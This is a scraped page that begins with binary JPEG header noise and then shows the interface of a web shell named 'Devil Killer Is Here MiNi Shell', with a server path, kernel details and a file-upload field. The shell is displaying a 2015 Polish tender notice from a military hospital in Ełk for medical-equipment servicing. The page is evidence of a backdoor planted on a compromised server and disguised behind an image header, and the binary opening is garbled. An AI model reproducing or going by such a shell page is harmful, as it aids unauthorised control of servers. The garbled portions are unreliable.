JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150521/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150521/120140-N-2015.html

<p class="kh_header"><b>Ełk: USŁUGA W ZAKRESIE PRZEGLĄDÓW, KONSERWACJI I NAPRAW SPRZĘTU MEDYCZNEGO</b><br>
<b>Numer ogłoszenia: 120140 - 2015; data zamieszczenia: 21.05.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> 108 Szpital Wojskowy z Przychodnią SP ZOZ , ul. Kościuszki 30, 19-300 Ełk, woj. warmińsko-mazurskie, tel. 087 6219803, faks 087 6219807.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.108spzoz.elk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> USŁUGA W ZAKRESIE PRZEGLĄDÓW, KONSERWACJI I NAPRAW SPRZĘTU MEDYCZNEGO.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi polegające na przeglądzie, konserwacji oraz naprawie sprzętu medycznego na rzecz i w siedzibie Zamawiającego 
Wykaz sprzętu objętego Zamówieniem publicznym określa Załącznik Nr 2 do SIWZ.
Wykonawca ma obowiązek serwisowania sprzętu medycznego zgodnie z ustawą z dnia 20 maja 2010 r. o wyrobach medycznych (Dz. U. z 2010 r. Nr 107, poz. 679)
Zamawiający wymaga, aby Wykonawca posiadał zaświadczenie wystawione przez producenta sprzętu medycznego potwierdzające, że zleceniobiorca jest autoryzowaną firmą lub dysponuje pracownikami, którzy są uprawnieni do obsługi   serwisowej , dokonywania przeglądów i konserwacji aparatury/sprzętu medycznego oraz posiadał na ten fakt potwierdzenie producenta wystawione nie wcześniej niż 5 lat przed upływem terminu składania ofert.
Przez przeglądy techniczne i konserwację rozumie się wykonywanie czynności, których zakres określają zalecenia producenta aparatu, polegające na sprawdzeniu poprawności działania urządzenia, przeprowadzeniu koniecznych kalibracji, konserwacji prewencyjnych oraz wymianie części zużywalnych i potwierdzenie wykonania tych czynności protokołem serwisowym i wpisem do paszportu technicznego aparatu.
Przegląd techniczny i konserwacja polega na:
-	czynnościach konserwacyjno - przeglądowych poprzedzonych zebraniem informacji o zaobserwowanych przez użytkownika usterkach, oględzinach aparatu, usunięciu zauważonych usterek, prac konserwacyjnych określonych przez producenta, regulacjach i pomiarach kontrolnych, sprawdzeniu działania aparatu, naprawach bieżących, uwzględniających zalecenia producentów urządzeń dotyczące zakresu i częstotliwości konserwacji podane w dokumentacji technicznej oraz zachowując przepisy bhp i ppoż., oraz wymagania nałożone przez NFZ.
-	Wystawieniu raportu serwisowego i wpisu do dokumentacji eksploatacji sprzętu (paszportu) wykonanych czynności.
-	Legalizacji (wystawieniem certyfikatu bądź protokołu z legalizacji aparatu, sprzętu),
-	Kalibracji,
-	Sprawdzeniu instalacji,
-	Ustawieniu (regulacji) wymaganych przez producenta parametrów,
		Naprawa sprzętu medycznego polega na:
-	Przywróceniu sprawności aparatu po awarii.
-	Legalizacji.
-	Kalibracjach oraz regulacje wymagane przez producenta i obowiązujące w tym zakresie przepisy.
		Zakres czynności wykonywanych w ramach przeglądów i terminy ich wykonania powinny być zgodne z zaleceniami producenta i obowiązującymi przepisami prawa, a w szczególności zgodnie z ustawą z dnia 20 maja 2010 r. o wyrobach medycznych (Dz. U. z 2010 r. Nr 107, poz.679 z późn. zm.),
Podczas pierwszego przeglądu Wykonawca sprawdza kompletność dokumentacji aparatu, w szczególności instrukcji użytkownika. W miarę potrzeby dokumentacja aparatu uzupełniana jest przez Wykonawcę,
W miarę potrzeby w ramach przeglądów będą prowadzone instruktaże dla użytkownika (w cenie przeglądu),
Każda czynność (przegląd, konserwacja i naprawa) powinna zostać wpisana przez Wykonawcę do paszportu technicznego urządzenia, a w przypadku konieczności wycofania urządzenia z eksploatacji zostanie wydane (w cenie przeglądu) odpowiednie orzeczenie techniczne.
Przyjmujący zamówienie ponosi odpowiedzialność za wszelkie szkody związane z nieprawidłowym wykonaniem przeglądu, konserwacji i naprawy. 
W cenie za przegląd techniczny Wykonawca musi uwzględnić wszystkie koszty związane z tą usługą w tym dojazd do miejsca znajdującego się aparatu, sprzętu.
Wartość zamówienia obejmie koszt usługi wymiany części zamiennych i materiałów eksploatacyjnych niezbędnych do wykonania naprawy w urządzeniach medycznych, koszty zatrudnienia wykwalifikowanych pracowników, ubezpieczenia, oraz dojazd do Zamawiającego, koszt robocizny, narzędzi; 
Wartość zamówienia nie obejmie kosztów części zamiennych i materiałów eksploatacyjnych niezbędnych do wykonania naprawy w urządzeniach medycznych.
Do naprawy urządzeń medycznych Wykonawca zobowiązany jest użyć fabrycznie nowych i oryginalnych części zamiennych i materiałów eksploatacyjnych.
Koszty części zamiennych oraz konieczności naprawy w serwisie producenta należy każdorazowo konsultować z Zamawiającym w zakresie opłacalności naprawy.
Cena dotycząca przeglądów okresowych musi zawierać wszystkie koszty ponoszone przez Wykonawcę w skali roku w związku z wykonywaniem przeglądów okresowych, łącznie z kosztami dojazdu do siedziby Zamawiającego.
Wykonawca wykonuje usługi objęte umową w siedzibie Zamawiającego. W razie potrzeby wykonania usług poza siedzibą Zamawiającego, Wykonawca dokonuje transportu sprzętu medycznego do swojej siedziby i z powrotem na własny koszt.
Zamawiający zobowiązany jest do należytej dbałości o aparat poprzez: 
-	powierzenie jego obsługi osobom przeszkolonym, o odpowiednich kwalifikacjach;
-	przestrzeganie zasad obsługi zawartych w instrukcjach fabrycznych oraz zalecanych przez Wykonawcę;
Okres gwarancji udzielony przez Wykonawcę wynosi odpowiednio:
-	na wymienione części - 6 miesięcy. Okres gwarancji ulega wydłużeniu, jeśli producent tych części zastosował dłuższą gwarancję;
-	termin gwarancji liczony jest od dnia odbioru wykonanych prac.
Wykonawca podejmie się przystąpienia do naprawy urządzeń medycznych w czasie nie dłuższym niż do 12 godzin od chwili zgłoszenia uszkodzenia lub awarii sprzętu będącego przedmiotem zamówienia liczone w dniach roboczych.
Po zaakceptowaniu przez Zamawiającego terminu naprawy zostanie ona wykonana w czasie nie dłuższym niż 72 godziny liczone w dniach roboczych od czasu przesłania decyzji do Wykonawcy. Jeżeli otrzymanie akceptacji będzie miało miejsce w piątek, czas dokonania naprawy liczy się od poniedziałku.
W przypadku napraw wymagających wysłania naprawianego sprzętu do zagranicznego serwisu, termin naprawy wynosi do 10 dni roboczych.
Wykonawca zobowiązuje się utrzymać obsługę serwisową w dyspozycji w godzinach od 8.00 do 20.00 w dni robocze.
Naprawy wykonywane będą przez Wykonawcę na podstawie odrębnych zleceń po uprzednio dokonanej i zatwierdzonej przez Zamawiającego nieodpłatnej ekspertyzie stanu technicznego, określającej zakres uszkodzenia i koszty naprawy.
Do wykonywania naprawy Wykonawca użyje części nowych, nieużywanych o parametrach techniczno - użytkowych dostosowanych do danego typu sprzętu .
Wymienione elementy będą posiadały gwarancję producenta
Wykonawca zobowiązuje się do zawarcia na własny koszt umowy ubezpieczenia odpowiedzialności cywilnej z tytułu wszelkich szkód mogących powstać w związku wykonywaniem niniejszej umowy w okresie jej obowiązywania. 
Wykonawca zobowiązany jest do dokumentowania prowadzonej usługi i przedstawienie wyników wykonanych prac Zamawiającemu, w tym do:
-	prowadzenia ewidencji wykonanych prac;
-	potwierdzania kart napraw i przeglądów po wykonaniu usługi;
-	dokonywania wpisów w paszportach technicznych urządzeń dotyczących zakresu przeprowadzonych napraw, przeglądów technicznych, konserwacji urządzeń oraz wymiany części zamiennych.
Jeżeli w opisie przedmiotu zamówienia znajdują się jakiekolwiek: znak towarowy, patent czy pochodzenie - należy przyjąć, że Zamawiający podał taki opis ze wskazaniem na typ i dopuszcza do składania ofert równoważnych o parametrach techniczno - eksploatacyjno - użytkowych nie gorszych niż te, podane pod pojęciem typu (podstawa prawna: art. 29 ust. 3 ustawy - Prawo zamówień publicznych). 
W przypadku złożenia oferty, w której zostanie zaoferowany asortyment o parametrach równoważnych - Wykonawca zobowiązany jest złożyć oświadczenie, iż oferta jest równoważna z opisem przedmiotu zamówienia. Wykonawca musi wskazać nazwę asortymentu równoważnego oraz wskazać (podać) dokumenty potwierdzające równoważność rozwiązań tj. atesty polskie i europejskie, certyfikaty itp. Zamawiający korzystając ewentualnie z opinii rzeczoznawców dokona oceny zaproponowanych rozwiązań oraz zadecyduje o ich równoważności. Przedstawienie w ofercie towaru uznanego przez Zamawiającego za nie równoważny spowoduje odrzucenie oferty jako niezgodnej z SIWZ. W przypadku wątpliwości obowiązek udowodnienia równoważności złożonej oferty spoczywa na Wykonawcy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9, 50.42.10.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 25.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Ustala się wadium w zakresie poszczególnych zadań od 1 do 25 w wysokości:

Zadanie Nr 1	269,00	Dwieście sześćdziesiąt dziewięć  zł 00/100, Zadanie Nr 2	240,00	Dwieście czterdzieści zł 00/100, Zadanie Nr 3	120,00	Sto dwadzieścia zł 00/100, Zadanie Nr 4	200,00	Dwieście zł 00/100, Zadanie Nr 5	172,00	Sto siedemdziesiąt dwa zł 00/100, Zadanie Nr 6	40,00	        Czterdzieści zł 00/100, Zadanie Nr 7	120,00	Sto dwadzieścia zł 00/100, Zadanie Nr 8	270,00	Dwieście siedemdziesiąt zł 00/100, Zadanie Nr 9	180,00	Sto osiemdziesiąt zł 00/100, Zadanie Nr 10	160,00	Sto sześćdziesiąt zł 00/100, Zadanie Nr 11	600,00	Sześćset złotych 00/100, Zadanie Nr 12	228,00	Dwieście dwadzieścia osiem zł 00/100, Zadanie Nr 13	80,00	        Osiemdziesiąt złotych 00/100 , Zadanie Nr 14	60,00	        Sześćdziesiąt złotych 00/100, Zadanie Nr 15	40,00	        Czterdzieści złotych 00/100, Zadanie Nr16	80,00	        Osiemdziesiąt złotych 00/100, Zadanie Nr 17	100,00	Sto złotych 00/100, Zadanie Nr 18	370,00	Trzysta siedemdziesiąt zł 00/100, Zadanie Nr 19	120,00	Sto dwadzieścia zł 00/100, Zadanie Nr 20	100,00	Sto złotych 00/100, Zadanie Nr 21	100,00	Sto złotych 00/100, Zadanie Nr 22	170,00	Sto siedemdziesiąt zł 00/100, Zadanie Nr 23	240,00	Dwieście czterdzieści zł 00/100, Zadanie Nr 24	130,00	Sto trzydzieści zł 00/100, Zadanie Nr 25	520,00	Pięćset dwadzieścia zł 00/100 wadium dla całości przedmiotu zamówienia w wysokości: 4 709,00 zł słownie: cztery tysiące sześćset pięćdziesiąt dziewięć zł 00/100.

Wykonawca wnosi wadium w wybranej przez siebie, wymienionej poniżej, formie:
1)	w pieniądzu, przelewem na rachunek bankowy: 
2)	w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że zobowiązanie kasy jest zobowiązaniem pieniężnym,
3)	w gwarancjach bankowych, 
4)	w gwarancjach ubezpieczeniowych 
5)	w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275) w terminie 2015-06-03 godz. 09:30, sposób przekazania: dołączyć do oferty.
2.	Za termin wniesienia wadium w formie przelewu pieniężnego przyjmuje się termin uznania na rachunku zamawiającego. 
3.	W zakresie wadium obowiązują uregulowania Prawa zamówień publicznych zawarte w art. 45 i 46.
4.	Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy: Bank Gospodarstwa Krajowego Oddział Olsztyn nr 61 1130 1189 0025 0021 1720 0002 z adnotacją WADIUM - 06/2014-DZP/PNO
5.	Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym.
6.	Wadium wniesione w pieniądzu należy złożyć najpóźniej na dzień przed terminem otwarcia ofert. Przy czym za termin wniesienia wadium w formie pieniężnej przyjmuje się termin uznania na rachunku bankowym zamawiającego.
7.	Wadium wniesione w pieniądzu, zostanie zwrócone wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.
8.	Wadium wniesione w formie innej niż pieniądz należy złożyć w formie oryginału, razem z ofertą w osobnej kopercie.
9.	Polisa, poręczenie, gwarancja lub inny dokument stanowiący formę wadium winno zawierać stwierdzenie, że na pierwsze pisemne żądanie Zamawiającego wzywające do zapłaty kwoty wadium zgodnie z warunkami specyfikacji istotnych warunków zamówienia, następuje jego bezwarunkowa wypłata bez jakichkolwiek zastrzeżeń ze strony gwaranta / poręczyciela.
10.	W przypadku niezabezpieczeni oferty jedną z określonych w niniejszej specyfikacji form wadium wykonawca zostanie wykluczony z udziału w postępowaniu, a jego oferta podlegać będzie odrzuceniu.
11.	Zamawiający zwróci niezwłocznie wadium wszystkim wykonawcom po wyborze najkorzystniejszej oferty lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta zostanie wybrana jako najkorzystniejsza.
12.	Wykonawcy, którego oferta zostanie wybrana jako najkorzystniejsza, Zamawiający zwróci wadium niezwłocznie po zawarciu umowy.
13.	Zamawiający zwróci niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
14.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie, lub zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.
15.	W zakresie wadium obowiązują uregulowania Prawa zamówień publicznych zawarte w art. 45 i 46 Prawa zamówień publicznych</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Wykonawca zobowiązany jest złożyć oświadczenie, o spełnianiu warunków, o których mowa w art. 22 ust. 1 Ustawy z dnia 29 stycznia 2004 r. Prawo Zamówień Publicznych.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest wykazanie przez wykonawcę realizacji co najmniej jednej (1) usługi w zakresie PRZEGLĄDÓW, KONSERWACJI I NAPRAW SPRZĘTU MEDYCZNEGO o wartości co najmniej 148 500,00 PLN brutto (sto czterdzieści osiem tysięcy pięćset złotych 00/100) w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie. W sytuacji złożenia oferty częściowej obejmującej wybrane Zadanie, Zamawiający określa wymaganą minimalną wartość brutto usług dla poszczególnych Zadań. W takiej sytuacji wartość wykazanych usług (każdej oddzielnie) musi odpowiadać wartością sumie wszystkich Zadań, na które Wykonawca złoży ofertę. 
Wartość usługi
Numer zadania nr 1- 8 000,00
Numer zadania nr2-	7 500,00
Numer zadania nr3-	3 500,00
Numer zadania nr4-	6 000,00
Numer zadania nr5-	6 000,00
Numer zadania nr6-	1 000,00
Numer zadania nr7-	3 000,00
Numer zadania nr8-	8 000,00
Numer zadania nr9-	5 000,00
Numer zadania nr10-	5 000,00
Numer zadania nr11-	15 000,00
Numer zadania nr12-	7 000,00
Numer zadania nr13-	2 500,00
Numer zadania nr14-	1 500,00
Numer zadania nr15-	1 000,00
Numer zadania nr16-	2 500,00
Numer zadania nr17-	3 000,00
Numer zadania nr18-	15 000,00
Numer zadania nr19-	3 700,00
Numer zadania nr20-	3 000,00
Numer zadania nr21-	3 000,00
Numer zadania nr22-	5 300,00
Numer zadania nr23-	13 000,00
Numer zadania nr24-	4000,00
Numer zadania nr25-	16000,00</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Wykonawca zobowiązany jest złożyć oświadczenie, o spełnianiu warunków, o których mowa w art. 22 ust. 1 Ustawy z dnia 29 stycznia 2004 r. Prawo Zamówień Publicznych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Wykonawca zobowiązany jest złożyć oświadczenie, o spełnianiu warunków, o których mowa w art. 22 ust. 1 Ustawy z dnia 29 stycznia 2004 r. Prawo Zamówień Publicznych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

